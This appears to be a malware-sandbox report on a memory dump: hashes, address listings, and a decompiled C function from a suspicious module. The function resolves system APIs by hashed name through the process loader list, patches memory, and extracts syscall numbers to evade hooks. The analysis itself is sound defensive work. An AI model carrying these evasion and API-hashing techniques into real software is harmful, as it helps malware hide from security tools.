                                                                                        0x1001969a
                                                                                        0x00000000
                                                                                        0x100196ab
                                                                                        0x00000000
                                                                                        0x100196ab
                                                                                        0x10019668
                                                                                        0x1001966b
                                                                                        0x1001967e
                                                                                        0x1001967f
                                                                                        0x10019683
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1001966b
                                                                                        0x10019661
                                                                                        0x100195ed
                                                                                        0x1001964a
                                                                                        0x1001964e
                                                                                        0x10019654
                                                                                        0x00000000
                                                                                        0x10019654
                                                                                        0x100195ef
                                                                                        0x100195f3
                                                                                        0x10019600
                                                                                        0x10019604
                                                                                        0x1001961a
                                                                                        0x10019622
                                                                                        0x10019606
                                                                                        0x10019608
                                                                                        0x10019612
                                                                                        0x10019612
                                                                                        0x10019628
                                                                                        0x10019631
                                                                                        0x10019648
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10019648
                                                                                        0x10019633
                                                                                        0x10019633
                                                                                        0x00000000
                                                                                        0x10019628

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.749018753.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000002.00000002.749011351.0000000010000000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749036684.000000001001A000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749045623.000000001001D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749056111.000000001001F000.00000002.00020000.sdmp Download File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID: 0-3916222277
                                                                                        • Opcode ID: 78ded7ad58ccfe6e39af61f505e9c63cd873381c8b4d26e632723182d8e82be7
                                                                                        • Instruction ID: 40addf1f47f77ce90969db43eb15dc0c4582e7f707f2120123862ccb300b72ca
                                                                                        • Opcode Fuzzy Hash: 78ded7ad58ccfe6e39af61f505e9c63cd873381c8b4d26e632723182d8e82be7
                                                                                        • Instruction Fuzzy Hash: A922893080C7998BE729CF15C49136ABBE0FF86340F14886EE9D65F291D335DA85DB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 90%
                                                                                        			E10011460(signed char __eax, signed char __edx) {
                                                                                        				void* __ebx;
                                                                                        				void* __esi;
                                                                                        				void* __ebp;
                                                                                        				signed char _t231;
                                                                                        				signed char _t233;
                                                                                        				signed char _t238;
                                                                                        				intOrPtr _t241;
                                                                                        				void* _t246;
                                                                                        				signed char _t257;
                                                                                        				signed char _t261;
                                                                                        				signed char _t269;
                                                                                        				signed char _t270;
                                                                                        				signed char _t277;
                                                                                        				signed int _t279;
                                                                                        				signed char _t280;
                                                                                        				signed char _t281;
                                                                                        				void* _t289;
                                                                                        				void* _t290;
                                                                                        				signed char _t315;
                                                                                        				void* _t319;
                                                                                        				signed char _t334;
                                                                                        				signed char _t336;
                                                                                        				void* _t341;
                                                                                        				void* _t347;
                                                                                        				intOrPtr _t352;
                                                                                        				signed char _t354;
                                                                                        				signed char _t363;
                                                                                        				void* _t369;
                                                                                        				intOrPtr _t371;
                                                                                        				signed short* _t373;
                                                                                        				void _t375;
                                                                                        				void* _t379;
                                                                                        				signed int _t381;
                                                                                        				void* _t382;
                                                                                        				void** _t383;
                                                                                        				void* _t384;
                                                                                        				char* _t387;
                                                                                        				signed char _t395;
                                                                                        				signed char* _t396;
                                                                                        				intOrPtr _t400;
                                                                                        				signed int _t451;
                                                                                        				intOrPtr* _t455;
                                                                                        				signed char _t456;
                                                                                        				signed int _t462;
                                                                                        				void* _t467;
                                                                                        				signed char _t471;
                                                                                        				signed char _t472;
                                                                                        				signed char* _t477;
                                                                                        				signed char _t487;
                                                                                        				signed int _t490;
                                                                                        				intOrPtr* _t496;
                                                                                        				intOrPtr _t497;
                                                                                        				signed char _t498;
                                                                                        				signed char _t499;
                                                                                        				intOrPtr _t500;
                                                                                        				signed char _t508;
                                                                                        				intOrPtr _t510;
                                                                                        				void* _t513;
                                                                                        				signed char _t519;
                                                                                        				intOrPtr* _t524;
                                                                                        				signed char _t525;
                                                                                        				signed char _t526;
                                                                                        				signed char _t527;
                                                                                        				signed char _t529;
                                                                                        				signed char* _t531;
                                                                                        				signed char _t532;
                                                                                        				void* _t533;
                                                                                        				void* _t534;
                                                                                        				signed char* _t535;
                                                                                        
                                                                                        				_t535[0x54] = __edx;
                                                                                        				 *_t535 = __eax;
                                                                                        				_t231 = E10010328(__edx, 1);
                                                                                        				if(_t231 != 0) {
                                                                                        					return _t231;
                                                                                        				}
                                                                                        				_t535[0x2c] = _t231;
                                                                                        				if( *0x1001d208 == 0 ||  *0x1001d2e4 != 0) {
                                                                                        					L44:
                                                                                        					if( *_t535 == 0) {
                                                                                        						return 0;
                                                                                        					}
                                                                                        					_t233 =  *_t535;
                                                                                        					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
                                                                                        					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
                                                                                        					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
                                                                                        					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
                                                                                        					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
                                                                                        					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
                                                                                        						L77:
                                                                                        						 *_t535 = 0;
                                                                                        						_t535[0x2c] = 0;
                                                                                        						L78:
                                                                                        						return  *_t535;
                                                                                        					}
                                                                                        					_t535[0x12c] = 0;
                                                                                        					_t535[0x174] = _t535[0x54] ^ 0x7af3da47;
                                                                                        					do {
                                                                                        						_t467 = 0;
                                                                                        						_t387 =  *_t524 +  *_t535;
                                                                                        						_t238 =  *_t387;
                                                                                        						_t535[0x58] = _t238;
                                                                                        						if(_t238 == 0) {
                                                                                        							L49:
                                                                                        							if(E10014FD4( &(_t535[0x58]), _t467) == _t535[0x174]) {
                                                                                        								_t535[0x2c] = 0;
                                                                                        								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
                                                                                        								__eflags = _t241 - _t510;
                                                                                        								if(_t241 < _t510) {
                                                                                        									L57:
                                                                                        									_t471 =  *_t535 + _t241;
                                                                                        									__eflags = _t471;
                                                                                        									 *_t535 = _t471;
                                                                                        									_t535[0x2c] = _t471;
                                                                                        									L58:
                                                                                        									__eflags =  *_t535;
                                                                                        									if( *_t535 == 0) {
                                                                                        										goto L78;
                                                                                        									}
                                                                                        									__eflags =  *0x1001d2ec |  *0x1001d2ed;
                                                                                        									if(( *0x1001d2ec |  *0x1001d2ed) == 0) {
                                                                                        										_t525 =  *0x1001d208; // 0x9cab0a6e
                                                                                        										__eflags = _t525;
                                                                                        										if(_t525 == 0) {
                                                                                        											 *0x1001d2ec = 1;
                                                                                        											_t526 = E100135F4(0x1c4);
                                                                                        											__eflags = _t526;
                                                                                        											if(_t526 == 0) {
                                                                                        												_t526 = 0;
                                                                                        												__eflags = 0;
                                                                                        											} else {
                                                                                        												E10011C54(_t526, 0x10);
                                                                                        												 *(_t526 + 0x1c0) = 0;
                                                                                        											}
                                                                                        											 *0x1001d208 = _t526;
                                                                                        											 *0x1001d2ec = 0;
                                                                                        											L68:
                                                                                        											_t246 = 0;
                                                                                        											_t472 = 0;
                                                                                        											__eflags = 0;
                                                                                        											while(1) {
                                                                                        												__eflags =  *(_t472 + _t526 + 8);
                                                                                        												if( *(_t472 + _t526 + 8) == 0) {
                                                                                        													break;
                                                                                        												}
                                                                                        												_t246 = _t246 + 1;
                                                                                        												_t472 = _t472 + 0x1c;
                                                                                        												__eflags = _t246 - 0x10;
                                                                                        												if(_t246 < 0x10) {
                                                                                        													continue;
                                                                                        												}
                                                                                        												_t375 = E100135F4(0x1c4);
                                                                                        												__eflags = _t375;
                                                                                        												if(_t375 == 0) {
                                                                                        													_t375 = 0;
                                                                                        													__eflags = 0;
                                                                                        												} else {
                                                                                        													E10011C54(_t375, 0x10);
                                                                                        													 *(_t375 + 0x1c0) = 0;
                                                                                        												}
                                                                                        												 *(_t375 + 0x14) = _t535[0x2c];
                                                                                        												E1000DFF8(_t375,  &(_t535[0x58]));
                                                                                        												 *(_t375 + 8) = _t535[0x54];
                                                                                        												 *(_t526 + 0x1c0) = _t375;
                                                                                        												L76:
                                                                                        												 *_t535 = _t535[0x2c];
                                                                                        												goto L78;
                                                                                        											}
                                                                                        											_t527 = _t526 + _t472;
                                                                                        											__eflags = _t527;
                                                                                        											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
                                                                                        											E1000DFF8(_t527,  &(_t535[0x58]));
                                                                                        											 *(_t527 + 8) = _t535[0x54];
                                                                                        											goto L76;
                                                                                        										}
                                                                                        										_t257 =  *(_t525 + 0x1c0);
                                                                                        										while(1) {
                                                                                        											__eflags = _t257;
                                                                                        											if(_t257 == 0) {
                                                                                        												goto L68;
                                                                                        											}
                                                                                        											_t526 = _t257;
                                                                                        											_t257 =  *(_t257 + 0x1c0);
                                                                                        										}
                                                                                        										goto L68;
                                                                                        									}
                                                                                        									__eflags = _t535[0x54] - 0x82fffbdc;
                                                                                        									if(_t535[0x54] == 0x82fffbdc) {
                                                                                        										 *0x1001d20c =  *_t535;
                                                                                        									} else {
                                                                                        										__eflags = _t535[0x54] - 0xdb278333;
                                                                                        										if(_t535[0x54] == 0xdb278333) {
                                                                                        											 *0x1001d210 =  *_t535;
                                                                                        										}
                                                                                        									}
                                                                                        									goto L78;
                                                                                        								}
                                                                                        								__eflags = _t241 - _t535[0x130];
                                                                                        								if(_t241 >= _t535[0x130]) {
                                                                                        									goto L57;
                                                                                        								}
                                                                                        								_t535[0x130] =  &(_t535[0x58]);
                                                                                        								_t261 = E1000E8D4( &(_t535[0x58]), 0x7fffffff);
                                                                                        								_t477 =  &(_t535[0x12c]);
                                                                                        								 *_t477 = _t261;
                                                                                        								_t477[2] = _t261 + 1;
                                                                                        								_t395 = E10013044(0xfe338407, 0xccbfc9a9, 0xfe338407, 0xfe338407);
                                                                                        								__eflags = _t395;
                                                                                        								if(_t395 != 0) {
                                                                                        									_t202 =  &(_t535[0x12c]); // 0x100
                                                                                        									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
                                                                                        								}
                                                                                        								 *_t535 = _t535[0x2c];
                                                                                        								goto L58;
                                                                                        							}
                                                                                        							goto L50;
                                                                                        						} else {
                                                                                        							goto L48;
                                                                                        						}
                                                                                        						do {
                                                                                        							L48:
                                                                                        							_t467 = _t467 + 1;
                                                                                        							_t270 =  *((intOrPtr*)(_t467 + _t387));
                                                                                        							_t535[_t467 + 0x58] = _t270;
                                                                                        						} while (_t270 != 0);
                                                                                        						goto L49;
                                                                                        						L50:
                                                                                        						_t524 = _t524 + 4;
                                                                                        						_t396 =  &(_t535[0x12c]);
                                                                                        						_t373 =  &(_t373[1]);
                                                                                        						_t269 =  *_t396 + 1;
                                                                                        						 *_t396 = _t269;
                                                                                        					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
                                                                                        					goto L77;
                                                                                        				} else {
                                                                                        					_t535[0x30] = 0;
                                                                                        					 *0x1001d2e4 = 1;
                                                                                        					E1000F5A8( &(_t535[0x38]), 0);
                                                                                        					E1000F5A8( &(_t535[0x168]), 0x1c);
                                                                                        					_t535[0x58] = E1000F4E0( &(_t535[0x168]), 0);
                                                                                        					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
                                                                                        					_t535[0x48] =  *(_t400 + 0xc);
                                                                                        					_t535[0x60] =  *(_t400 + 0x10);
                                                                                        					goto L5;
                                                                                        					L6:
                                                                                        					_t384 = 0;
                                                                                        					do {
                                                                                        						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
                                                                                        							goto L13;
                                                                                        						}
                                                                                        						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
                                                                                        						_t496 = E10013044(0xfe338407, 0x790529cb, _t279, _t279);
                                                                                        						if(_t496 == 0) {
                                                                                        							L10:
                                                                                        							_t456 = _t535[0x50];
                                                                                        							_t497 =  *((intOrPtr*)(_t529 + 0xc));
                                                                                        							_t498 = _t497 + _t456;
                                                                                        							_t500 =  *((intOrPtr*)(_t529 + 8));
                                                                                        							_t535[0x28] = _t498;
                                                                                        							_t499 = _t498 + _t500;
                                                                                        							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
                                                                                        							_t535[0x24] = _t529;
                                                                                        							_t535[0x20] =  *(_t535[0x48] + 0x30);
                                                                                        							if((_t499 & 0x00000003) == 0) {
                                                                                        								L12:
                                                                                        								_t535[0x1c] = _t363;
                                                                                        								_t535[0x18] = _t499;
                                                                                        								E1000F84C( &(_t535[0xc]), E1000F4F0( &(_t535[8])) + 0x14);
                                                                                        								_t369 = E1000F4E0( &(_t535[0xc]), E1000F4F0( &(_t535[8])) + 0xffffffec);
                                                                                        								_t462 = 5;
                                                                                        								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
                                                                                        								_t535 =  &(_t535[0xc]);
                                                                                        								_t535[4] = _t535[4] + 1;
                                                                                        								goto L13;
                                                                                        							} else {
                                                                                        								goto L11;
                                                                                        							}
                                                                                        							do {
                                                                                        								L11:
                                                                                        								_t499 = _t499 + 1;
                                                                                        								_t363 = _t363 - 1;
                                                                                        							} while ((_t499 & 0x00000003) != 0);
                                                                                        							goto L12;
                                                                                        						}
                                                                                        						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
                                                                                        						if(0 < 0) {
                                                                                        							goto L13;
                                                                                        						}
                                                                                        						goto L10;
                                                                                        						L13:
                                                                                        						_t384 = _t384 + 1;
                                                                                        						_t529 = _t529 + 0x28;
                                                                                        					} while (_t384 < _t535[0x5c]);
                                                                                        					L14:
                                                                                        					_t280 = _t535[4];
                                                                                        					_t535[0x44] = _t280;
                                                                                        					if(_t280 <= 1) {
                                                                                        						L21:
                                                                                        						if(_t535[0x44] <= 0) {
                                                                                        							L24:
                                                                                        							_t281 = _t535[0x48];
                                                                                        							_t556 = _t281 - _t535[0x60];
                                                                                        							if(_t281 != _t535[0x60]) {
                                                                                        								_t535[0x48] =  *_t281;
                                                                                        								E1000F678( &(_t535[8]));
                                                                                        								L5:
                                                                                        								_t277 =  *(_t535[0x48] + 0x18);
                                                                                        								_t535[0x50] = _t277;
                                                                                        								_t535[4] = 0;
                                                                                        								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
                                                                                        								E1000F5A8( &(_t535[0xc]), 0);
                                                                                        								_t279 =  *(_t379 + 6) & 0x0000ffff;
                                                                                        								_t535[0x5c] = _t279;
                                                                                        								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
                                                                                        								if(_t279 <= 0) {
                                                                                        									goto L14;
                                                                                        								}
                                                                                        								goto L6;
                                                                                        							}
                                                                                        							E1000F678( &(_t535[8]));
                                                                                        							E1000F678( &(_t535[0x164]));
                                                                                        							E1000F5A8( &(_t535[0x48]), 0);
                                                                                        							_t535[0x18] = 0;
                                                                                        							E1000F5A8( &(_t535[0x20]), 0);
                                                                                        							_push(0xfe338407);
                                                                                        							_t289 = E10011D58(0xfe338407);
                                                                                        							_t290 = E10011310( &(_t535[0x154]), _t517, _t556);
                                                                                        							_push(_t290);
                                                                                        							_push(_t290);
                                                                                        							E10011C90( &(_t535[0x164]), 0xfe338407);
                                                                                        							_t518 =  &(_t535[0x178]);
                                                                                        							E1000D058( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
                                                                                        							_push(0x80);
                                                                                        							_push(0);
                                                                                        							E10015CAC( &(_t535[0x114]), _t556, _t535[0x184], 1);
                                                                                        							E10015CE0( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
                                                                                        							_push(_t289);
                                                                                        							E10018DE0( &(_t535[0xe4]),  &(_t535[0x180]), 2);
                                                                                        							E1000F678( &(_t535[0x180]));
                                                                                        							_t557 = _t535[0x114];
                                                                                        							if(_t535[0x114] != 0) {
                                                                                        								E1000BB88( &(_t535[0x110]));
                                                                                        							}
                                                                                        							E1000D020( &(_t535[0x104]));
                                                                                        							E1000D020(_t518);
                                                                                        							E1000D020( &(_t535[0x15c]));
                                                                                        							E1000D020( &(_t535[0x154]));
                                                                                        							E100190C4( &(_t535[0xdc]), 0xffffffff);
                                                                                        							_t535[0x118] = _t535[0xf0];
                                                                                        							E1000F63C( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
                                                                                        							_push(1);
                                                                                        							E10019088( &(_t535[0x11c]));
                                                                                        							_t381 = 0;
                                                                                        							_t535[0x64] = 0;
                                                                                        							_t535[0x60] = 0;
                                                                                        							do {
                                                                                        								_t535[0x58] = E1000F4E0( &(_t535[0x38]), _t535[0x60]);
                                                                                        								_t535[0x70] = E1000F4F0( &(_t535[0x44]));
                                                                                        								_t519 =  *(0x1001bd40 + _t381 * 4);
                                                                                        								_t531 = E10019054( &(_t535[0xf4]), _t519, _t519);
                                                                                        								if(_t531 == 0) {
                                                                                        									goto L42;
                                                                                        								}
                                                                                        								_t508 = E100187C0( &(_t535[0x11c]), _t519,  *_t531);
                                                                                        								_t532 =  *_t531;
                                                                                        								while(_t532 ==  *_t508) {
                                                                                        									_t508 = _t508 + 8;
                                                                                        									__eflags = _t508;
                                                                                        								}
                                                                                        								_t315 =  *_t508;
                                                                                        								_t535[0x74] = _t315;
                                                                                        								_t535[0x78] = _t315 - _t532;
                                                                                        								if(_t381 != 0) {
                                                                                        									L38:
                                                                                        									_t535[0x68] = E1000F4F0( &(_t535[0x44]));
                                                                                        									_t535[0x6c] = _t519;
                                                                                        									E1000F500( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
                                                                                        									_t319 = E1000F4F0( &(_t535[0x44]));
                                                                                        									_t487 = _t535[0x58];
                                                                                        									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
                                                                                        									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
                                                                                        										E1000F84C( &(_t535[0x20]), E1000F4F0( &(_t535[0x1c])) + 8);
                                                                                        										E1000F4E0( &(_t535[0x20]), E1000F4F0( &(_t535[0x1c])) + 0xfffffff8);
                                                                                        										asm("movsd");
                                                                                        										asm("movsd");
                                                                                        										_t535[0x18] = _t535[0x18] + 1;
                                                                                        										__eflags = _t381 - 0x1d;
                                                                                        										if(__eflags == 0) {
                                                                                        											_t228 =  &(_t535[0x44]); // 0x2c
                                                                                        											E10013154(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
                                                                                        										}
                                                                                        										goto L42;
                                                                                        									}
                                                                                        									E1000F84C( &(_t535[0x48]), _t535[0x70]);
                                                                                        									E10013154(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
                                                                                        									E1000F864( &(_t535[0x44]), _t563);
                                                                                        									E1000F864( &(_t535[0x1c]), _t563);
                                                                                        									_t381 = _t381 - 1;
                                                                                        									_t334 = _t535[0x64] + 1;
                                                                                        									_t535[0x60] = _t535[0x60] + 0x14;
                                                                                        									_t535[0x18] = 0;
                                                                                        									_t535[0x64] = _t334;
                                                                                        									if(_t334 == _t535[0x30]) {
                                                                                        										break;
                                                                                        									}
                                                                                        									goto L42;
                                                                                        								}
                                                                                        								E10019114( &(_t535[0x134]), _t519);
                                                                                        								_t535[0x5c] = _t532;
                                                                                        								while(1) {
                                                                                        									_t336 = _t535[0x5c];
                                                                                        									_t562 =  *_t336 - 0xb8;
                                                                                        									if( *_t336 == 0xb8) {
                                                                                        										break;
                                                                                        									}
                                                                                        									_t490 = _t535[0x5c] + E100190DC( &(_t535[0x138]), __eflags, _t535[0x74]);
                                                                                        									_t535[0x5c] = _t490;
                                                                                        									__eflags = _t490 -  *_t508;
                                                                                        									if(__eflags < 0) {
                                                                                        										continue;
                                                                                        									}
                                                                                        									L37:
                                                                                        									E1000F678( &(_t535[0x144]));
                                                                                        									E1000F678( &(_t535[0x134]));
                                                                                        									goto L38;
                                                                                        								}
                                                                                        								 *0x1001d2e8 =  *((intOrPtr*)(_t336 + 1));
                                                                                        								goto L37;
                                                                                        								L42:
                                                                                        								_t381 = _t381 + 1;
                                                                                        							} while (_t381 < 0x1e);
                                                                                        							E1000F678( &(_t535[0x11c]));
                                                                                        							E10018E40(_t381,  &(_t535[0xd8]));
                                                                                        							E1000F678( &(_t535[0x1c]));
                                                                                        							E1000F678( &(_t535[0x44]));
                                                                                        							E1000F678( &(_t535[0x34]));
                                                                                        							goto L44;
                                                                                        						}
                                                                                        						_t533 = 0;
                                                                                        						_t382 = 0;
                                                                                        						do {
                                                                                        							_t341 = E1000F4E0( &(_t535[0xc]), _t382);
                                                                                        							_t517 = _t341;
                                                                                        							E1000F84C( &(_t535[0x38]), E1000F4F0( &(_t535[0x34])) + 0x14);
                                                                                        							_t347 = E1000F4E0( &(_t535[0x38]), E1000F4F0( &(_t535[0x34])) + 0xffffffec);
                                                                                        							_t451 = 5;
                                                                                        							memcpy(_t347, _t341, _t451 << 2);
                                                                                        							_t535 =  &(_t535[0xc]);
                                                                                        							_t533 = _t533 + 1;
                                                                                        							_t382 = _t382 + 0x14;
                                                                                        							_t535[0x30] = _t535[0x30] + 1;
                                                                                        						} while (_t533 < _t535[0x44]);
                                                                                        						goto L24;
                                                                                        					}
                                                                                        					_t535[0x4c] = 1;
                                                                                        					_t534 = 0x14;
                                                                                        					do {
                                                                                        						_t62 = _t534 - 0x14; // 0x0
                                                                                        						_t383 = E1000F4E0( &(_t535[0xc]), _t62);
                                                                                        						_t455 = E1000F4E0( &(_t535[0xc]), _t534);
                                                                                        						_t517 =  *_t383;
                                                                                        						_t352 =  *_t455;
                                                                                        						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
                                                                                        							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
                                                                                        						}
                                                                                        						_t534 = _t534 + 0x14;
                                                                                        						_t354 = _t535[0x4c] + 1;
                                                                                        						_t535[0x4c] = _t354;
                                                                                        					} while (_t354 < _t535[0x44]);
                                                                                        					_t535[0x44] = _t535[4];
                                                                                        					goto L21;
                                                                                        				}
                                                                                        			}








































































                                                                                        0x1001146c
                                                                                        0x10011473
                                                                                        0x10011476
                                                                                        0x1001147d
                                                                                        0x10011bff
                                                                                        0x10011bff
                                                                                        0x10011483
                                                                                        0x1001148e
                                                                                        0x100119cd
                                                                                        0x100119d1
                                                                                        0x00000000
                                                                                        0x10011c50
                                                                                        0x100119d7
                                                                                        0x100119da
                                                                                        0x100119dd
                                                                                        0x100119e7
                                                                                        0x100119f6
                                                                                        0x100119f8
                                                                                        0x100119ff
                                                                                        0x10011be9
                                                                                        0x10011beb
                                                                                        0x10011bee
                                                                                        0x10011bf2
                                                                                        0x00000000
                                                                                        0x10011bf2
                                                                                        0x10011a0e
                                                                                        0x10011a19
                                                                                        0x10011a20
                                                                                        0x10011a23
                                                                                        0x10011a25
                                                                                        0x10011a28
                                                                                        0x10011a2b
                                                                                        0x10011a31
                                                                                        0x10011a3f
                                                                                        0x10011a4f
                                                                                        0x10011a74
                                                                                        0x10011a85
                                                                                        0x10011a88
                                                                                        0x10011a8a
                                                                                        0x10011aee
                                                                                        0x10011af1
                                                                                        0x10011af1
                                                                                        0x10011af3
                                                                                        0x10011af6
                                                                                        0x10011afa
                                                                                        0x10011afa
                                                                                        0x10011afe
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011b0b
                                                                                        0x10011b11
                                                                                        0x10011b45
                                                                                        0x10011b4b
                                                                                        0x10011b4d
                                                                                        0x10011c1c
                                                                                        0x10011c24
                                                                                        0x10011c27
                                                                                        0x10011c29
                                                                                        0x10011c40
                                                                                        0x10011c40
                                                                                        0x10011c2b
                                                                                        0x10011c2f
                                                                                        0x10011c34
                                                                                        0x10011c34
                                                                                        0x10011c42
                                                                                        0x10011c48
                                                                                        0x10011b67
                                                                                        0x10011b67
                                                                                        0x10011b69
                                                                                        0x10011b69
                                                                                        0x10011b6b
                                                                                        0x10011b6b
                                                                                        0x10011b70
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011b72
                                                                                        0x10011b73
                                                                                        0x10011b76
                                                                                        0x10011b79
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011b85
                                                                                        0x10011b88
                                                                                        0x10011b8a
                                                                                        0x10011ba1
                                                                                        0x10011ba1
                                                                                        0x10011b8c
                                                                                        0x10011b90
                                                                                        0x10011b95
                                                                                        0x10011b95
                                                                                        0x10011bae
                                                                                        0x10011bb1
                                                                                        0x10011bba
                                                                                        0x10011bbd
                                                                                        0x10011be0
                                                                                        0x10011be4
                                                                                        0x00000000
                                                                                        0x10011be4
                                                                                        0x10011bc5
                                                                                        0x10011bc5
                                                                                        0x10011bd1
                                                                                        0x10011bd4
                                                                                        0x10011bdd
                                                                                        0x00000000
                                                                                        0x10011bdd
                                                                                        0x10011b53
                                                                                        0x10011b63
                                                                                        0x10011b63
                                                                                        0x10011b65
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011b5b
                                                                                        0x10011b5d
                                                                                        0x10011b5d
                                                                                        0x00000000
                                                                                        0x10011b63
                                                                                        0x10011b13
                                                                                        0x10011b1b
                                                                                        0x10011b3b
                                                                                        0x10011b1d
                                                                                        0x10011b1d
                                                                                        0x10011b25
                                                                                        0x10011b2e
                                                                                        0x10011b2e
                                                                                        0x10011b25
                                                                                        0x00000000
                                                                                        0x10011b1b
                                                                                        0x10011a8c
                                                                                        0x10011a93
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011aa0
                                                                                        0x10011aa6
                                                                                        0x10011aab
                                                                                        0x10011ab2
                                                                                        0x10011ab6
                                                                                        0x10011acb
                                                                                        0x10011acd
                                                                                        0x10011acf
                                                                                        0x10011ad5
                                                                                        0x10011ae3
                                                                                        0x10011ae3
                                                                                        0x10011ae9
                                                                                        0x00000000
                                                                                        0x10011ae9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011a33
                                                                                        0x10011a33
                                                                                        0x10011a33
                                                                                        0x10011a34
                                                                                        0x10011a37
                                                                                        0x10011a3b
                                                                                        0x00000000
                                                                                        0x10011a51
                                                                                        0x10011a54
                                                                                        0x10011a57
                                                                                        0x10011a60
                                                                                        0x10011a63
                                                                                        0x10011a64
                                                                                        0x10011a66
                                                                                        0x00000000
                                                                                        0x100114a1
                                                                                        0x100114a3
                                                                                        0x100114a8
                                                                                        0x100114b3
                                                                                        0x100114c1
                                                                                        0x100114d4
                                                                                        0x100114e1
                                                                                        0x100114ea
                                                                                        0x100114ee
                                                                                        0x100114f2
                                                                                        0x1001153a
                                                                                        0x1001153a
                                                                                        0x1001153c
                                                                                        0x10011543
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1001155c
                                                                                        0x10011564
                                                                                        0x10011568
                                                                                        0x1001157d
                                                                                        0x10011581
                                                                                        0x10011585
                                                                                        0x1001158e
                                                                                        0x10011594
                                                                                        0x10011597
                                                                                        0x1001159b
                                                                                        0x100115a3
                                                                                        0x100115a5
                                                                                        0x100115a9
                                                                                        0x100115b0
                                                                                        0x100115b9
                                                                                        0x100115b9
                                                                                        0x100115bd
                                                                                        0x100115d2
                                                                                        0x100115e8
                                                                                        0x100115f5
                                                                                        0x100115f6
                                                                                        0x100115f6
                                                                                        0x100115f8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x100115b2
                                                                                        0x100115b2
                                                                                        0x100115b2
                                                                                        0x100115b3
                                                                                        0x100115b4
                                                                                        0x00000000
                                                                                        0x100115b2
                                                                                        0x10011577
                                                                                        0x1001157b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x100115fc
                                                                                        0x100115fc
                                                                                        0x100115fd
                                                                                        0x10011600
                                                                                        0x1001160a
                                                                                        0x1001160a
                                                                                        0x1001160e
                                                                                        0x10011615
                                                                                        0x10011670
                                                                                        0x10011675
                                                                                        0x100116c8
                                                                                        0x100116c8
                                                                                        0x100116cc
                                                                                        0x100116d0
                                                                                        0x100114fa
                                                                                        0x100114fd
                                                                                        0x10011502
                                                                                        0x10011508
                                                                                        0x1001150b
                                                                                        0x10011512
                                                                                        0x10011516
                                                                                        0x1001151d
                                                                                        0x10011526
                                                                                        0x1001152a
                                                                                        0x1001152e
                                                                                        0x10011534
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011534
                                                                                        0x100116da
                                                                                        0x100116e6
                                                                                        0x100116f1
                                                                                        0x100116f8
                                                                                        0x10011701
                                                                                        0x1001170b
                                                                                        0x1001170c
                                                                                        0x1001171a
                                                                                        0x1001171f
                                                                                        0x10011720
                                                                                        0x1001172d
                                                                                        0x10011732
                                                                                        0x10011744
                                                                                        0x10011749
                                                                                        0x1001174e
                                                                                        0x10011760
                                                                                        0x10011772
                                                                                        0x10011777
                                                                                        0x10011782
                                                                                        0x10011789
                                                                                        0x1001178e
                                                                                        0x10011796
                                                                                        0x1001179f
                                                                                        0x1001179f
                                                                                        0x100117ab
                                                                                        0x100117b2
                                                                                        0x100117be
                                                                                        0x100117ca
                                                                                        0x100117d8
